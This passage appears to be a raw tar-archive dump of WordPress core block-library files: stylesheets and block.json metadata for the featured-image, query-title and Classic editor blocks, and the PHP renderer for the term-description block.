.wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){border-right-style:solid}.wp-block-post-featured-image[style*=height] .components-placeholder{height:100%;min-height:48px;min-width:48px;width:100%}.wp-block-post-featured-image>a{cursor:default}.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-button,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__instructions,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__label{opacity:1;pointer-events:auto}.wp-block-post-featured-image.is-transient{position:relative}.wp-block-post-featured-image.is-transient img{opacity:.3}.wp-block-post-featured-image.is-transient .components-spinner{position:absolute;right:50%;top:50%;transform:translate(50%,-50%)}div[data-type="core/post-featured-image"] img{display:block;height:auto;max-width:100%}post-featured-image/style-rtl.css000060400000003653151330427370013067 0ustar00.wp-block-post-featured-image{
  margin-left:0;
  margin-right:0;
}
.wp-block-post-featured-image a{
  display:block;
  height:100%;
}
.wp-block-post-featured-image img{
  box-sizing:border-box;
  height:auto;
  max-width:100%;
  vertical-align:bottom;
  width:100%;
}
.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{
  width:100%;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{
  background-color:#000;
  inset:0;
  position:absolute;
}
.wp-block-post-featured-image{
  position:relative;
}

.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{
  background-color:initial;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{
  opacity:0;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{
  opacity:.1;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{
  opacity:.2;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{
  opacity:.3;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{
  opacity:.4;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{
  opacity:.5;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{
  opacity:.6;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{
  opacity:.7;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{
  opacity:.8;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{
  opacity:.9;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{
  opacity:1;
}
.wp-block-post-featured-image:where(.alignleft,.alignright){
  width:100%;
}post-featured-image/block.json000060400000004434151330427370012401 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/post-featured-image",
	"title": "Featured Image",
	"category": "theme",
	"description": "Display a post's featured image.",
	"textdomain": "default",
	"attributes": {
		"isLink": {
			"type": "boolean",
			"default": false
		},
		"aspectRatio": {
			"type": "string"
		},
		"width": {
			"type": "string"
		},
		"height": {
			"type": "string"
		},
		"scale": {
			"type": "string",
			"default": "cover"
		},
		"sizeSlug": {
			"type": "string"
		},
		"rel": {
			"type": "string",
			"attribute": "rel",
			"default": ""
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		},
		"overlayColor": {
			"type": "string"
		},
		"customOverlayColor": {
			"type": "string"
		},
		"dimRatio": {
			"type": "number",
			"default": 0
		},
		"gradient": {
			"type": "string"
		},
		"customGradient": {
			"type": "string"
		},
		"useFirstImageFromPost": {
			"type": "boolean",
			"default": false
		}
	},
	"usesContext": [ "postId", "postType", "queryId" ],
	"supports": {
		"align": [ "left", "right", "center", "wide", "full" ],
		"color": {
			"text": false,
			"background": false
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"width": true,
			"__experimentalSkipSerialization": true,
			"__experimentalDefaultControls": {
				"color": true,
				"radius": true,
				"width": true
			}
		},
		"filter": {
			"duotone": true
		},
		"shadow": {
			"__experimentalSkipSerialization": true
		},
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"selectors": {
		"border": ".wp-block-post-featured-image img, .wp-block-post-featured-image .block-editor-media-placeholder, .wp-block-post-featured-image .wp-block-post-featured-image__overlay",
		"shadow": ".wp-block-post-featured-image img, .wp-block-post-featured-image .components-placeholder",
		"filter": {
			"duotone": ".wp-block-post-featured-image img, .wp-block-post-featured-image .wp-block-post-featured-image__placeholder, .wp-block-post-featured-image .components-placeholder__illustration, .wp-block-post-featured-image .components-placeholder::before"
		}
	},
	"editorStyle": "wp-block-post-featured-image-editor",
	"style": "wp-block-post-featured-image"
}
post-featured-image/style.min.css000060400000003441151330427370013045 0ustar00.wp-block-post-featured-image{margin-left:0;margin-right:0}.wp-block-post-featured-image a{display:block;height:100%}.wp-block-post-featured-image img{box-sizing:border-box;height:auto;max-width:100%;vertical-align:bottom;width:100%}.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{width:100%}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{background-color:#000;inset:0;position:absolute}.wp-block-post-featured-image{position:relative}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{background-color:initial}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{opacity:0}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{opacity:.1}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{opacity:.2}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{opacity:.3}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{opacity:.4}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{opacity:.5}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{opacity:.6}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{opacity:.7}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{opacity:.8}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{opacity:.9}.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{opacity:1}.wp-block-post-featured-image:where(.alignleft,.alignright){width:100%}post-featured-image/style.css000060400000003653151330427370012270 0ustar00.wp-block-post-featured-image{
  margin-left:0;
  margin-right:0;
}
.wp-block-post-featured-image a{
  display:block;
  height:100%;
}
.wp-block-post-featured-image img{
  box-sizing:border-box;
  height:auto;
  max-width:100%;
  vertical-align:bottom;
  width:100%;
}
.wp-block-post-featured-image.alignfull img,.wp-block-post-featured-image.alignwide img{
  width:100%;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim{
  background-color:#000;
  inset:0;
  position:absolute;
}
.wp-block-post-featured-image{
  position:relative;
}

.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-gradient{
  background-color:initial;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-0{
  opacity:0;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-10{
  opacity:.1;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-20{
  opacity:.2;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-30{
  opacity:.3;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-40{
  opacity:.4;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-50{
  opacity:.5;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-60{
  opacity:.6;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-70{
  opacity:.7;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-80{
  opacity:.8;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-90{
  opacity:.9;
}
.wp-block-post-featured-image .wp-block-post-featured-image__overlay.has-background-dim-100{
  opacity:1;
}
.wp-block-post-featured-image:where(.alignleft,.alignright){
  width:100%;
}post-featured-image/editor-rtl.css000060400000011677151330427370013222 0ustar00.wp-block-post-featured-image .block-editor-media-placeholder{
  -webkit-backdrop-filter:none;
          backdrop-filter:none;
  z-index:1;
}
.wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{
  align-items:center;
  display:flex;
  justify-content:center;
  min-height:200px;
  padding:0;
}
.wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{
  display:none;
}
.wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{
  align-items:center;
  background:var(--wp-admin-theme-color);
  border-color:var(--wp-admin-theme-color);
  border-radius:50%;
  border-style:solid;
  color:#fff;
  display:flex;
  height:48px;
  justify-content:center;
  margin:auto;
  padding:0;
  position:relative;
  width:48px;
}
.wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{
  color:inherit;
}
.wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){
  border-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){
  border-top-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-color]),.wp-block-post-featured-image img:where([style*=border-right-color]){
  border-left-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-color]),.wp-block-post-featured-image img:where([style*=border-bottom-color]){
  border-bottom-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-left-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-color]),.wp-block-post-featured-image img:where([style*=border-left-color]){
  border-right-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-width]),.wp-block-post-featured-image img:where([style*=border-width]){
  border-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-top-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-width]),.wp-block-post-featured-image img:where([style*=border-top-width]){
  border-top-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-right-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-right-width]),.wp-block-post-featured-image img:where([style*=border-right-width]){
  border-left-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-bottom-width]),.wp-block-post-featured-image img:where([style*=border-bottom-width]){
  border-bottom-style:solid;
}
.wp-block-post-featured-image .components-placeholder:where([style*=border-left-width]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-left-width]),.wp-block-post-featured-image img:where([style*=border-left-width]){
  border-right-style:solid;
}
.wp-block-post-featured-image[style*=height] .components-placeholder{
  height:100%;
  min-height:48px;
  min-width:48px;
  width:100%;
}
.wp-block-post-featured-image>a{
  cursor:default;
}
.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-button,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__instructions,.wp-block-post-featured-image.is-selected .components-placeholder.has-illustration .components-placeholder__label{
  opacity:1;
  pointer-events:auto;
}
.wp-block-post-featured-image.is-transient{
  position:relative;
}
.wp-block-post-featured-image.is-transient img{
  opacity:.3;
}
.wp-block-post-featured-image.is-transient .components-spinner{
  position:absolute;
  right:50%;
  top:50%;
  transform:translate(50%, -50%);
}

div[data-type="core/post-featured-image"] img{
  display:block;
  height:auto;
  max-width:100%;
}query-title/style-rtl.css000060400000000061151330427370011477 0ustar00.wp-block-query-title{
  box-sizing:border-box;
}query-title/style.min.css000060400000000054151330427370011464 0ustar00.wp-block-query-title{box-sizing:border-box}query-title/block.json000060400000002266151330427370011024 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/query-title",
	"title": "Query Title",
	"category": "theme",
	"description": "Display the query title.",
	"textdomain": "default",
	"attributes": {
		"type": {
			"type": "string"
		},
		"textAlign": {
			"type": "string"
		},
		"level": {
			"type": "number",
			"default": 1
		},
		"showPrefix": {
			"type": "boolean",
			"default": true
		},
		"showSearchTerm": {
			"type": "boolean",
			"default": true
		}
	},
	"supports": {
		"align": [ "wide", "full" ],
		"html": false,
		"color": {
			"gradients": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-query-title"
}
query-title/style-rtl.min.css000060400000000054151330427370012263 0ustar00.wp-block-query-title{box-sizing:border-box}query-title/style.css000060400000000061151330427370010700 0ustar00.wp-block-query-title{
  box-sizing:border-box;
}term-description.php000060400000002470151330427370010551 0ustar00<?php
/**
 * Server-side rendering of the `core/term-description` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/term-description` block on the server.
 *
 * @since 5.9.0
 *
 * @param array $attributes Block attributes.
 *
 * @return string Returns the description of the current taxonomy term, if available
 */
function render_block_core_term_description( $attributes ) {
	$term_description = '';

	if ( is_category() || is_tag() || is_tax() ) {
		$term_description = term_description();
	}

	if ( empty( $term_description ) ) {
		return '';
	}

	$classes = array();
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	return '<div ' . $wrapper_attributes . '>' . $term_description . '</div>';
}

/**
 * Registers the `core/term-description` block on the server.
 *
 * @since 5.9.0
 */
function register_block_core_term_description() {
	register_block_type_from_metadata(
		__DIR__ . '/term-description',
		array(
			'render_callback' => 'render_block_core_term_description',
		)
	);
}
add_action( 'init', 'register_block_core_term_description' );
freeform/editor.min.css000060400000023317151330427370011142 0ustar00.wp-block-freeform.block-library-rich-text__tinymce{height:auto}.wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{line-height:1.8}.wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{margin-left:0;padding-left:2.5em}.wp-block-freeform.block-library-rich-text__tinymce blockquote{border-left:4px solid #000;box-shadow:inset 0 0 0 0 #ddd;margin:0;padding-left:1em}.wp-block-freeform.block-library-rich-text__tinymce pre{color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:15px;white-space:pre-wrap}.wp-block-freeform.block-library-rich-text__tinymce>:first-child{margin-top:0}.wp-block-freeform.block-library-rich-text__tinymce>:last-child{margin-bottom:0}.wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce a{color:var(--wp-admin-theme-color)}.wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{background:#e5f5fa;border-radius:2px;box-shadow:0 0 0 1px #e5f5fa;margin:0 -2px;padding:0 2px}.wp-block-freeform.block-library-rich-text__tinymce code{background:#f0f0f0;border-radius:2px;color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:14px;padding:2px}.wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{background:#ddd}.wp-block-freeform.block-library-rich-text__tinymce .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-freeform.block-library-rich-text__tinymce .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-freeform.block-library-rich-text__tinymce .aligncenter{display:block;margin-left:auto;margin-right:auto}.wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC);background-position:50%;background-repeat:no-repeat;background-size:1900px 20px;cursor:default;display:block;height:20px;margin:15px auto;outline:0;width:96%}.wp-block-freeform.block-library-rich-text__tinymce img::selection{background-color:initial}.wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{-ms-user-select:element}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{margin:0;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{display:block}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{-webkit-user-drag:none}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{margin:0;padding-top:.5em}.wp-block-freeform.block-library-rich-text__tinymce .wpview{border:1px solid #0000;clear:both;margin-bottom:16px;position:relative;width:99.99%}.wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{background:#0000;display:block;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{display:none}.wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{border:1px dashed #ddd;padding:10px}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{border:1px solid #ddd;margin:0;padding:1em 0;word-wrap:break-word}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{margin:0;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{border-color:#0000}.wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{display:block;font-size:32px;height:32px;margin:0 auto;width:32px}.wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{clear:both;content:"";display:table}.wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce .gallery a{cursor:default}.wp-block-freeform.block-library-rich-text__tinymce .gallery{line-height:1;margin:auto -6px;overflow-x:hidden;padding:6px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{box-sizing:border-box;float:left;margin:0;padding:6px;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{margin:0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{font-size:13px;margin:4px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{width:100%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{width:50%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{width:33.3333333333%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{width:25%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{width:20%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{width:16.6666666667%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{width:14.2857142857%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{width:12.5%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{width:11.1111111111%}.wp-block-freeform.block-library-rich-text__tinymce .gallery img{border:none;height:auto;max-width:100%;padding:0}div[data-type="core/freeform"]:before{border:1px solid #ddd;outline:1px solid #0000;transition:border-color .1s linear,box-shadow .1s linear}@media (prefers-reduced-motion:reduce){div[data-type="core/freeform"]:before{transition-delay:0s;transition-duration:0s}}div[data-type="core/freeform"].is-selected:before{border-color:#1e1e1e}div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{margin-top:0;padding-top:0}div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{clear:both;content:"";display:table}.mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{color:#1e1e1e}.mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{margin-left:8px;margin-right:0}.mce-toolbar-grp .mce-btn i{font-style:normal}.block-library-classic__toolbar{border:1px solid #ddd;border-bottom:none;border-radius:2px;display:none;margin:0 0 8px;padding:0;position:sticky;top:0;width:auto;z-index:31}div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{border-color:#1e1e1e;display:block}.block-library-classic__toolbar .mce-tinymce{box-shadow:none}@media (min-width:600px){.block-library-classic__toolbar{padding:0}}.block-library-classic__toolbar:empty{background:#f5f5f5;border-bottom:1px solid #e2e4e7;display:block}.block-library-classic__toolbar:empty:before{color:#555d66;content:attr(data-placeholder);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:37px;padding:14px}.block-library-classic__toolbar div.mce-toolbar-grp{border-bottom:1px solid #1e1e1e}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{height:auto!important;width:100%!important}.block-library-classic__toolbar .mce-container-body.mce-abs-layout{overflow:visible}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{position:static}.block-library-classic__toolbar .mce-toolbar-grp>div{padding:1px 3px}.block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){display:none}.block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{display:block}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{height:50vh!important}@media (min-width:960px){.block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){height:9999rem}.block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{height:100%}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{height:calc(100% - 52px)}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{display:flex;flex-direction:column;height:100%;min-width:50vw}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{display:flex;flex-direction:column;flex-grow:1}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{flex-grow:1;height:10px!important}}.block-editor-freeform-modal__actions{margin-top:16px}freeform/block.json000060400000000664151330427370010345 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/freeform",
	"title": "Classic",
	"category": "text",
	"description": "Use the classic WordPress editor.",
	"textdomain": "default",
	"attributes": {
		"content": {
			"type": "string",
			"source": "raw"
		}
	},
	"supports": {
		"className": false,
		"customClassName": false,
		"reusable": false
	},
	"editorStyle": "wp-block-freeform-editor"
}
freeform/editor-rtl.css000060400000025007151330427370011155 0ustar00.wp-block-freeform.block-library-rich-text__tinymce{
  height:auto;
}
.wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{
  line-height:1.8;
}
.wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{
  margin-right:0;
  padding-right:2.5em;
}
.wp-block-freeform.block-library-rich-text__tinymce blockquote{
  border-right:4px solid #000;
  box-shadow:inset 0 0 0 0 #ddd;
  margin:0;
  padding-right:1em;
}
.wp-block-freeform.block-library-rich-text__tinymce pre{
  color:#1e1e1e;
  font-family:Menlo,Consolas,monaco,monospace;
  font-size:15px;
  white-space:pre-wrap;
}
.wp-block-freeform.block-library-rich-text__tinymce>:first-child{
  margin-top:0;
}
.wp-block-freeform.block-library-rich-text__tinymce>:last-child{
  margin-bottom:0;
}
.wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{
  outline:none;
}
.wp-block-freeform.block-library-rich-text__tinymce a{
  color:var(--wp-admin-theme-color);
}
.wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{
  background:#e5f5fa;
  border-radius:2px;
  box-shadow:0 0 0 1px #e5f5fa;
  margin:0 -2px;
  padding:0 2px;
}
.wp-block-freeform.block-library-rich-text__tinymce code{
  background:#f0f0f0;
  border-radius:2px;
  color:#1e1e1e;
  font-family:Menlo,Consolas,monaco,monospace;
  font-size:14px;
  padding:2px;
}
.wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{
  background:#ddd;
}
.wp-block-freeform.block-library-rich-text__tinymce .alignright{
  float:right;
  margin:.5em 0 .5em 1em;
}
.wp-block-freeform.block-library-rich-text__tinymce .alignleft{
  float:left;
  margin:.5em 1em .5em 0;
}
.wp-block-freeform.block-library-rich-text__tinymce .aligncenter{
  display:block;
  margin-left:auto;
  margin-right:auto;
}
.wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{
  background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC);
  background-position:50%;
  background-repeat:no-repeat;
  background-size:1900px 20px;
  cursor:default;
  display:block;
  height:20px;
  margin:15px auto;
  outline:0;
  width:96%;
}
.wp-block-freeform.block-library-rich-text__tinymce img::selection{
  background-color:initial;
}
.wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{
  -ms-user-select:element;
}
.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{
  margin:0;
  max-width:100%;
}
.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{
  display:block;
}
.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{
  -webkit-user-drag:none;
}
.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{
  margin:0;
  padding-top:.5em;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview{
  border:1px solid #0000;
